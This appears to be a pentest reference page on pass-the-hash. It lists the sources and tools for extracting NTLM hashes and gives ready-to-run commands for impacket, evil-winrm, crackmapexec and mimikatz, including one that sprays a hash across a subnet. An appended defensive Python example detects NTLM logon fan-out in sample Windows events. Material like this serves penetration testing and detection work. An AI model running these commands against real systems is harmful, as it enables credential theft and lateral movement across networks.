Overview
Use the NTLM hash directly for authentication; there is no need to crack it. Works with SMB, WinRM, RDP (Restricted Admin), WMI, etc.
Impacket
CrackMapExec
Evil-WinRM
xfreerdp (RDP — Restricted Admin)
Mimikatz (Windows)
Spray Hash Across Subnet
Get the Hash
| Source | Tool |
|---|---|
| SAM database | secretsdump, reg save |
| LSASS memory | mimikatz, procdump |
| NTDS.dit | secretsdump, ntdsutil |
| DCSync | secretsdump -just-dc |
| Cached creds | mimikatz lsadump::cache |
Quick Reference
| Task | Command |
|---|---|
| PsExec | impacket-psexec DOM/user@TARGET -hashes :HASH |
| WinRM | evil-winrm -i TARGET -u user -H HASH |
| CME | crackmapexec smb TARGET -u user -H HASH |
| Mimikatz | sekurlsa::pth /user:admin /ntlm:HASH |
| Spray | crackmapexec smb SUBNET -u admin -H HASH |
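
For the defender's view of the Spray row above, this added example (not part of the original page or of any tool listed on it) flags one account making NTLM network logons from a single source to many hosts within a short window. The helper names, the thresholds and the constructed Windows Security 4624 events are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4624 (successful logon), pre-parsed.
# Field names follow the 4624 schema; hosts, users and IPs are made up.
def ev(t, host, user, ip, pkg="NTLM", ltype=3):
    return {"time": datetime.fromisoformat(t), "host": host, "EventID": 4624,
            "LogonType": ltype, "AuthenticationPackageName": pkg,
            "TargetUserName": user, "IpAddress": ip}

EVENTS = [
    ev("2024-05-01T10:00:01", "WS01", "admin", "10.0.0.50"),
    ev("2024-05-01T10:00:03", "WS02", "admin", "10.0.0.50"),
    ev("2024-05-01T10:00:04", "WS03", "admin", "10.0.0.50"),
    ev("2024-05-01T10:00:06", "FS01", "admin", "10.0.0.50"),
    ev("2024-05-01T10:00:07", "WS02", "admin", "10.0.0.50"),  # repeat host
    ev("2024-05-01T09:00:00", "FS01", "alice", "10.0.0.21", pkg="Kerberos"),
    ev("2024-05-01T09:30:00", "FS01", "bob", "10.0.0.22"),    # single NTLM logon
    ev("2024-05-01T11:00:00", "WS01", "svc_backup", "10.0.0.9"),
    ev("2024-05-01T13:00:00", "WS02", "svc_backup", "10.0.0.9"),  # hours apart
]

def find_ntlm_fanout(events, window=timedelta(minutes=5), min_hosts=4):
    """Return (user, source_ip, hosts) for each account/source pair that made
    NTLM network logons (type 3) to >= min_hosts distinct hosts within window."""
    groups = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4624 and e["LogonType"] == 3
                and e["AuthenticationPackageName"] == "NTLM"):
            groups[(e["TargetUserName"], e["IpAddress"])].append(e)
    alerts = []
    for (user, ip), evs in sorted(groups.items()):
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            hosts = {e["host"] for e in evs[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.append((user, ip, sorted(hosts)))
                break  # one alert per account/source pair
    return alerts

if __name__ == "__main__":
    for user, ip, hosts in find_ntlm_fanout(EVENTS):
        print(f"NTLM fan-out: {user} from {ip} -> {', '.join(hosts)}")
```

A 4624 record does not show whether a password or a hash was presented, so a hit is a lead for triage rather than proof of pass-the-hash.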